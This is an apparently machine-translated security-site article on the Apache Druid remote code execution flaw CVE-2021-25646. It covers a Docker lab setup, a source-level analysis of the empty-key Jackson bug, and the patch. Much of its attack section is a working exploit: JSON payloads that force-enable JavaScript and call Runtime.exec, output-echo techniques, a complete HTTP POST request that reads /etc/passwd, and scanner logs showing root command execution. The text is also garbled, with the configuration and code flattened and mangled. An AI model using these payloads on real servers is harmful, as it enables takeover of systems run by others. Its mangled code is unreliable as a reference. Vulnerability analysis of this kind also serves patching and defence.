Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

How to analyze Apache Druid remote Code execution vulnerability CVE-2021-25646

2025-01-18 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)05/31 Report--

How to carry out Apache Druid remote code execution vulnerability CVE-2021-25646 analysis, I believe that many inexperienced people do not know what to do, so this paper summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

Apache Druid remote Code execution vulnerability (CVE-2021-25646) shooting range Construction version: "2.2" volumes: metadata_data: {} middle_var: {} historical_var: {} broker_var: {} coordinator_var: {} router_var: {} services: postgres: container_name: postgres image: postgres:latest volumes:-metadata_data:/var/lib/postgresql/data environment: -POSTGRES_PASSWORD=FoolishPassword-POSTGRES_USER=druid-POSTGRES_DB=druid # Need 3.5 or later for container nodes zookeeper: container_name: zookeeper image: zookeeper:3.5 environment:-ZOO_MY_ID=1 coordinator: image: apache/druid:0.20.0 container_name: coordinator volumes: -. / storage:/opt/data-coordinator_var:/opt/druid/var depends_on: -zookeeper-postgres ports:-"8081 postgres 8081" command:-coordinator env_file:-environment broker: image: broker volumes:-broker_var:/opt/druid/var depends_on:-zookeeper-postgres-coordinator ports:-"8082 postgres 8082" command:-broker Env_file:-environment historical: image: apache/druid:0.20.0 container_name: historical volumes: -. / storage:/opt/data-historical_var:/opt/druid/var depends_on:-zookeeper-postgres-coordinator ports:-"8083 command:-historical env_file:-environment middlemanager: image: Apache/druid:0.20.0 container_name: middlemanager volumes: -. / storage:/opt/data-middle_var:/opt/druid/var depends_on:-zookeeper-postgres-coordinator ports:-"8091 storage:/opt/data 8091" command:-middleManager env_file:-environment router: image: apache/druid:0.20.0 container_name: router Volumes:-router_var:/opt/druid/var depends_on:-zookeeper-postgres-coordinator ports:-"8888 postgres 8888" command:-router env_file:-environment

Environment

# Java tuningDRUID_XMX=1gDRUID_XMS=1gDRUID_MAXNEWSIZE=250mDRUID_NEWSIZE=250mDRUID_MAXDIRECTMEMORYSIZE=6172mdruid_emitter_logging_logLevel=debugdruid_extensions_loadList= ["druid-histogram", "druid-datasketches", "druid-lookups-cached-global" "postgresql-metadata-storage"] druid_zk_service_host=zookeeperdruid_metadata_storage_host=druid.javascript.enabled = truedruid_metadata_storage_type=postgresqldruid_metadata_storage_connector_connectURI=jdbc:postgresql://postgres:5432/druiddruid_metadata_storage_connector_user=druiddruid_metadata_storage_connector_password=FoolishPassworddruid_coordinator_balancer_strategy=cachingCostdruid_indexer_runner_javaOptsArray= ["- server", "- Xmx1g", "- Xms1g", "- XX:MaxDirectMemorySize=4g", "- Duser.timezone=UTC", "- Dfile.encoding=UTF-8" "- Djava.util.logging.manager=org.apache.logging.log4j.jul.LogManager"] druid_indexer_fork_property_druid_processing_buffer_sizeBytes=268435456druid_storage_type=localdruid_storage_storageDirectory=/opt/data/segmentsdruid_indexer_logs_type=filedruid_indexer_logs_directory=/opt/data/indexing-logsdruid_processing_numThreads=2druid_processing_numMergeBuffers=2DRUID_LOG4J= vulnerability analysis

This article describes how to find the leak without the details of the loophole.

Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for use in high-trust environments, and is disabled by default. However, in Druid 0.20.0 and earlier, it is possible for an authenticated user to send a specially-crafted request that forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. This can be leveraged to execute code on the target machine with the privileges of the Druid server process.

From the information of cve, it can be inferred that Druid exists in version 0.20 and before, and the code can be executed through javascript.

Since javascript executes the command, you need to find the engine for js parsing.

By querying the document, it is found that Apache Druid has built-in Rhino.

Rhino is a parser that parses and executes Java code embedded in JavaScript. This function is to dynamically extend the function of Druid, which is disabled by default.

/ / core/src/main/java/org/apache/druid/js/JavaScriptConfig.java@PublicApipublic class JavaScriptConfig {public static final int DEFAULT_OPTIMIZATION_LEVEL = 9; private static final JavaScriptConfig ENABLED_INSTANCE = new JavaScriptConfig (true); @ JsonProperty private final boolean enabled; @ JsonCreator public JavaScriptConfig (@ JsonProperty ("enabled") boolean enabled) {this.enabled = enabled;}

You can see whether it is turned on or not through enabled, so as long as we find out where we can control it, we can use it.

Here, choose a process to make use of. Take javaScriptDimFilter.java as an example.

Indexing-service/src/main/java/org/apache/druid/indexing/overlord/sampler/IndexTaskSamplerSpec.javapublic class IndexTaskSamplerSpec implements SamplerSpec {@ Nullable private final DataSchema dataSchema; private final InputSource inputSource; / * InputFormat can be null if {@ link InputSource#needsFormat ()} = false. * / @ Nullable private final InputFormat inputFormat; @ Nullable private final SamplerConfig samplerConfig; private final InputSourceSampler inputSourceSampler JsonCreator public IndexTaskSamplerSpec (@ JsonProperty ("spec") final IndexTask.IndexIngestionSpec ingestionSpec, @ JsonProperty ("samplerConfig") @ Nullable final SamplerConfig samplerConfig, @ JacksonInject InputSourceSampler inputSourceSampler)-> server/src/main/java/org/apache/druid/segment/indexing/DataSchema.javaDataSchema @ JsonCreator public DataSchema (@ JsonProperty ("dataSource") String dataSource, @ JsonProperty ("timestampSpec") @ Nullable TimestampSpec timestampSpec, / / can be null in old task spec @ JsonProperty ("dimensionsSpec") @ Nullable DimensionsSpec dimensionsSpec / / can be null in old task spec @ JsonProperty ("metricsSpec") AggregatorFactory [] aggregators, @ JsonProperty ("granularitySpec") GranularitySpec granularitySpec, @ JsonProperty ("transformSpec") TransformSpec transformSpec, @ Deprecated @ JsonProperty ("parser") @ Nullable Map parserMap, @ JacksonInject ObjectMapper objectMapper)-> processing/src/main/java/org/apache/druid/segment/transform/TransformSpec.javaclass TransformSpec @ JsonCreator public TransformSpec (@ JsonProperty ("filter") final DimFilter filter JsonProperty ("transforms") final List transforms)-> processing/src/main/java/org/apache/druid/query/filter/DimFilter.java@JsonTypeInfo (use = JsonTypeInfo.Id.NAME, property = "type") @ JsonSubTypes (value = {@ JsonSubTypes.Type (name = "and", value = AndDimFilter.class), @ JsonSubTypes.Type (name = "or", value = OrDimFilter.class), @ JsonSubTypes.Type (name = "not", value = NotDimFilter.class) @ JsonSubTypes.Type (name = "selector", value = SelectorDimFilter.class), @ JsonSubTypes.Type (name = "columnComparison", value = ColumnComparisonDimFilter.class), @ JsonSubTypes.Type (name = "extraction", value = ExtractionDimFilter.class), @ JsonSubTypes.Type (name = "regex", value = RegexDimFilter.class), @ JsonSubTypes.Type (name = "search", value = SearchQueryDimFilter.class), @ JsonSubTypes.Type (name = "javascript", value = JavaScriptDimFilter.class) @ JsonSubTypes.Type (name = "spatial", value = SpatialDimFilter.class), @ JsonSubTypes.Type (name = "in", value = InDimFilter.class), @ JsonSubTypes.Type (name = "bound", value = BoundDimFilter.class), @ JsonSubTypes.Type (name = "interval", value = IntervalDimFilter.class), @ JsonSubTypes.Type (name = "like", value = LikeDimFilter.class), @ JsonSubTypes.Type (name = "expression", value = ExpressionDimFilter.class) @ JsonSubTypes.Type (name = "true", value = TrueDimFilter.class), @ JsonSubTypes.Type (name = "false", value = FalseDimFilter.class)})-> processing/src/main/java/org/apache/druid/query/filter/JavaScriptDimFilter.java @ JsonCreator public JavaScriptDimFilter (@ JsonProperty ("dimension") String dimension, @ JsonProperty ("function") String function, @ JsonProperty ("extractionFn") @ Nullable ExtractionFn extractionFn, @ JsonProperty ("filterTuning") @ Nullable FilterTuning filterTuning @ JacksonInject JavaScriptConfig config)-> core/src/main/java/org/apache/druid/js/JavaScriptConfig.java @ JsonCreator public JavaScriptConfig (@ JsonProperty ("enabled") boolean enabled) {this.enabled = enabled }

Now all that's left is how to modify the config configuration to enable javascript, by looking at the official patch https://github.com/apache/druid/pull/10818

Core/src/main/java/org/apache/druid/guice/GuiceAnnotationIntrospector.java

/ / We should not allow empty names in any case. However, there is a known bug in Jackson deserializer / / with ignorals (_ arrayDelegateDeserializer is not copied when creating a contextual deserializer. / / See https://github.com/FasterXML/jackson-databind/issues/3022 for more details), which makes array / / deserialization failed even when the array is a valid field. To work around this bug, we return / / an empty ignoral when the given Annotated is a parameter with JsonProperty that needs to be deserialized. / / This is valid because every property with JsonProperty annoation should have a non-empty name. / / We can simply remove the below check after the Jackson bug is fixed. / This check should be fine for so-called delegate creators that have only one argument without / / JsonProperty annotation, because this method is not even called for the argument of / / delegate creators. I am not 100% sure why it's not called, but guess it's because the argument / / is some Java type that Jackson already knows how to deserialize. Since there is only one argument, / / Jackson perhaps is able to just deserialize it without introspection.

As you can see from the comments in the patch file GuiceAnnotationIntrospector.java, even if the key of a key-value pair is empty, jackson still parses it under certain circumstances and passes the value with a null key to the attribute that is not modified by @ JsonProperty. A link to jackson issues is also given in the comments, which addresses this issue.

JsonCreator is used to indicate that a specific constructor is called when json is deserialized.

@ JsonProperty is used on an attribute to serialize the name of the attribute to another name, such as @ JsonProperty ("before") String after, which parses the contents of the json whose key is before to the after variable.

When annotating the @ JsonCreator modifier method (@ JsonCreator is used to indicate that a specific constructor is called when json deserialization occurs)

All parameters of the method are parsed to CreatorProperty types, and if the property is not modified by @ JsonProperty, a CreatorProperty,Jackson with a name of "" is created and a value entered by the user with the key of "" is assigned to the property.

Based on this problem, we can overwrite a specific value by passing in data in json format if the above conditions are met.

In the above code, config is not modified by @ JsonProperty, so when the user passes in a key-value pair with an empty key, in the form of {"": "ParseToConfig"}, ParseToConfig is parsed to the config variable. (ParseToConfig is not a JavaScriptConfig type, this is only a simple demonstration)

So here you can control the config variable outside the developer's expectation and continue to see what has been done in the JavaScriptConfig class.

We need to construct "": {"enabled": true} to open javascript enabled

Complete packets can be generated according to code or searched directly in README, and there are many examples.

JavaScript parsing entry / / org.apache.druid.query.filter.JavaScriptDimFilterpublic boolean applyInContext (Context cx, Object input) {if (extractionFn! = null) {input = extractionFn.apply (input);} return Context.toBoolean (fnApply.call (cx, scope, scope, new Object [] {input}));} differences between new and old versions

When testing the old version 0.15.0, it is found that poc is not universal. Prompt [spec.ioConfig.firehose] is required to view the corresponding code.

/ / indexing-service/src/main/java/org/apache/druid/indexing/overlord/sampler/IndexTaskSamplerSpec.java @ JsonCreator public IndexTaskSamplerSpec (@ JsonProperty ("spec") final IndexTask.IndexIngestionSpec ingestionSpec, @ JsonProperty ("samplerConfig") final SamplerConfig samplerConfig, @ JacksonInject FirehoseSampler firehoseSampler @ JsonProperty ("samplerConfig") @ Nullable final SamplerConfig samplerConfig, @ JacksonInject InputSourceSampler inputSourceSampler) {this.dataSchema = Preconditions.checkNotNull (ingestionSpec, "[spec] is required") .getDataSchema () Preconditions.checkNotNull (ingestionSpec.getIOConfig (), "[spec.ioConfig] is required"); this.firehoseFactory = Preconditions.checkNotNull (ingestionSpec.getIOConfig (). GetFirehoseFactory (), "[spec.ioConfig.firehose] is required"); if (ingestionSpec.getIOConfig (). GetInputSource ()! = null) {this.inputSource = ingestionSpec.getIOConfig (). GetInputSource () If (ingestionSpec.getIOConfig (). GetInputSource (). NeedsFormat ()) {this.inputFormat = Preconditions.checkNotNull (ingestionSpec.getIOConfig (). GetInputFormat (), "[spec.ioConfig.inputFormat] is required");} else {this.inputFormat = null }} else {final FirehoseFactory firehoseFactory = Preconditions.checkNotNull (ingestionSpec.getIOConfig (). GetFirehoseFactory (), "[spec.ioConfig.firehose] is required"); if (! (firehoseFactory instanceof FiniteFirehoseFactory)) {throw new IAE ("firehose should be an instanceof FiniteFirehoseFactory");} this.inputSource = new FirehoseFactoryToInputSourceAdaptor ((FiniteFirehoseFactory) firehoseFactory, ingestionSpec.getDataSchema (). GetParser ()) This.inputFormat = null;} this.samplerConfig = samplerConfig; this.firehoseSampler = firehoseSampler; this.inputSourceSampler = inputSourceSampler;}

The file has been modified three times in history, and the old version of firehose is a must. Note here that firehose does not have inline in version 0.15.0 of type, so it is replaced by other types.

0.20.0 POC

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline" "data": "{\" timestamp\ ":\" 2020-12-12T12:10:21.040Z\ ",\" xxx\ ":\" x\ "}}," inputFormat ": {" type ":" json " "keepNullColumns": true}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp" "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [] "filter": {"type": "javascript", "dimension": "added", "function": "function (value) {java.lang.Runtime.getRuntime () .exec ('command')}" "": {"enabled": true}, "type": "index" "tuningConfig": {"type": "index"}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

Change POC,inputSource to the new version of firehose,inputFormat, removed in order to be compatible with the old version. Use parser to parse files

{"type": "index", "spec": {"ioConfig": {"type": "index", "firehose": {"type": "local" "baseDir": "/ xxx", "filter": "xxx"}}, "dataSchema": {"dataSource": "% DATASOURCE%%" "parser": {"parseSpec": {"format": "json", "timestampSpec": {}, "dimensionsSpec": {} }}, "samplerConfig": {"numRows": 10}} tortuous command echo

POC, as a scanner, should be compatible with old and new versions, and should be detected accurately. It is impossible to execute the command without echo (consider the situation that you can't get out of the network).

Echo thinking

1. Get the global request,response to modify the resposne content of the current CurrentThread

two。 Error echo

3. Write to file, read file

File descriptor for 4.linux socket (Druid cannot be installed in windows)

5..

Echo method of reading and writing files

Write the result in json format to / tmp using the package of jackson through command execution

Function (value) {var a=new java.io.BufferedWriter (new java.io.FileWriter (\ "/ tmp/123.json\")); var cmd = java.lang.Runtime.getRuntime (). Exec (\ "{{command}}\"); var test = new com.fasterxml.jackson.databind.ObjectMapper (); var jsonObj = test.createObjectNode (); jsonObj.put (\ "time\",\ "2015-09-12T00:46:58.771Z\") JsonObj.put (\ "test\", new java.util.Scanner (cmd.getInputStream ()). UseDelimiter (\ "\ A\") .next (); a.write (jsonObj.toString ()); a.close ()

Get the command result by writing a file and then reading any file using druid

But there is a hole here, because I want to write a general new and old version of POC, so I cannot use inline. I use the local method here, but if the read file is in the wrong format, it will lead to an abnormal exit and the process does not go to the place where the command is executed.

Here are the preconditions.

Find a legal parsing file so that he can not report an error (the new version can directly use only inline without error report, no impact)

This way is definitely not what we want, continue to look at the code analysis, and then found that the function function can also be executed under parse, and then the command that happens to be executed during parsing finishes the command before the exception.

{"dataSchema": {"dataSource": "% DATASOURCE%%", "parser": {"parseSpec": {"format": "javascript", "timestampSpec": {}, "dimensionsSpec": {}, "function": "function () {xxxx}}" "": {"enabled": "true"} direct command echo

When looking at the parseSpec document, it is found that function can directly modify the echo content, and the content of return is {key:value}.

Improved POC, direct page output command results

{"type": "index", "spec": {"ioConfig": {"type": "index", "firehose": {"type": "local" "baseDir": "/ etc", "filter": "passwd"}}, "dataSchema": {"dataSource": "% DATASOURCE%%" "parser": {"parseSpec": {"format": "javascript", "timestampSpec": {}, "dimensionsSpec": {} "function": "function () {var s = new java.util.Scanner (java.lang.Runtime.getRuntime (). Exec (\" {{command}}\ "). GetInputStream (). UseDelimiter (\"\ A\ ") .next () Return {timestamp:\ "2013-09-01T12:41:27Z\", test: s} " "": {"enabled": "true"} "samplerConfig": {"numRows": 10}} vulnerability fix

Upgrade to Apache Druid 0.20.1.

Strengthen access control and prohibit unauthorized users from accessing the web management page.

Official code fix:

/ / org.apache.druid.guice.GuiceAnnotationIntrospector @ Override public JsonIgnoreProperties.Value findPropertyIgnorals (Annotated ac) {if (ac instanceof AnnotatedParameter) {final AnnotatedParameter ap = (AnnotatedParameter) ac; if (ap.hasAnnotation (JsonProperty.class)) {return JsonIgnoreProperties.Value.empty ();}} return JsonIgnoreProperties.Value.forIgnoredProperties (");}

Overridden the findPropertyIgnorals method of Jackson

/ / com.fasterxml.jackson.databind.AnnotationIntrospectorpublic JsonIgnoreProperties.Value findPropertyIgnorals (Annotated ac) {/ / 18-Oct-2016, tatu: Used to call deprecated methods for backwards / / compatibility in 2.8, but not any more in 2.9return JsonIgnoreProperties.Value.empty ();}

In this method, JsonIgnoreProperties.Value.empty () is returned. This means that Jackson allows an attribute with an empty name.

The code judgment logic after repair is: null is allowed when the attribute is modified by @ JsonProperty, and null is not allowed if the attribute is not modified by @ JsonProperty.

Exploit POST / druid/indexer/v1/sampler HTTP/1.1Host: localhost:8888Accept: application/json, text/plainAccept-Encoding: gzip, deflateContent-Type: application/jsonContent-Length: 902Connection: keep-alive {"type": "index", "spec": {"ioConfig": {"type": "index" "firehose": {"type": "local", "baseDir": "/ etc", "filter": "passwd"}}, "dataSchema": {"dataSource": "% DATASOURCE%%" "parser": {"parseSpec": {"format": "javascript", "timestampSpec": {}, "dimensionsSpec": {} "function": "function () {var s = new java.util.Scanner (java.lang.Runtime.getRuntime (). Exec (\" {{command}}\ "). GetInputStream (). UseDelimiter (\"\ A\ ") .next () Return {timestamp:\ "2013-09-01T12:41:27Z\", test: s}} ",": {" enabled ":" true "}} "samplerConfig": {"numRows": 10}} PSF case ╭─ huakai at huakai-deMacBook-Pro in ⌁ / go/src/phenixsuite (develop ● 4 ✚ 7 … 1 ⚑ 70) ╰─ λ. / phenixsuite scan-- poc static/pocs/apache-druid-cve-2021-25646-rce-attack.yml-- url http://127.0.0.1:8888-- mode attack-- options shell 127 < 00:00:00 < 11:20:26input command (require): id2021/02/04 11:20:47 scan.go:496: [INFO] attack poc-yaml-apache-druid-cve-2021-25646-rce-attack2021/02/04 11:20:47 scan.go:142: [INFO] scan poc num:1 total:12021/02/04 11:20:48 scan.go:633: [INFO] poc:poc-yaml-apache-druid-cve-2021-25646-rce-attack execute success2021/02/04 11:20:48 scan. Go:313: [INFO] vul exist poc:poc-yaml-apache-druid-cve-2021-25646-rce-attack url: http://127.0.0.1:8888 # target-url poc-name gev-id level category status author require detail-extend -1 http://127.0.0.1:8888 poc-yaml-apache-druid-cve-2021-25646-rce-attack GEV-143659 critical code-exec exist huakai uid=0 (root) gid=0 (root) groups=0 (root)\\ nfinish reading the above Do you know how to analyze Apache Druid remote code execution vulnerabilities CVE-2021-25646? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report